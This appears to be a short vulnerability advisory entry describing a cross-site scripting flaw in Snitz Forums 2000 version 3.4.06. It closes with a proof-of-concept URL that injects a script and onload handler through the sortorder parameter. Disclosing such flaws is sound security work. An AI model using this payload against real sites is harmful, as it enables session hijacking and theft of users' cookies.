9 lines
No EOL
548 B
Text
9 lines
No EOL
548 B
Text
source: https://www.securityfocus.com/bid/20004/info
|
|
|
|
Snitz Forums 2000 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
|
|
|
This could allow an attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
|
|
Version 3.4.06 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/[path]/forum.asp?FORUM_ID=1&ARCHIVE=true&sortfield=lastpost&sortorder="><script>function%20xssbaslat(){alert("Xss%20Here");}</script><body%20onload="xssbaslat()"> etc.. |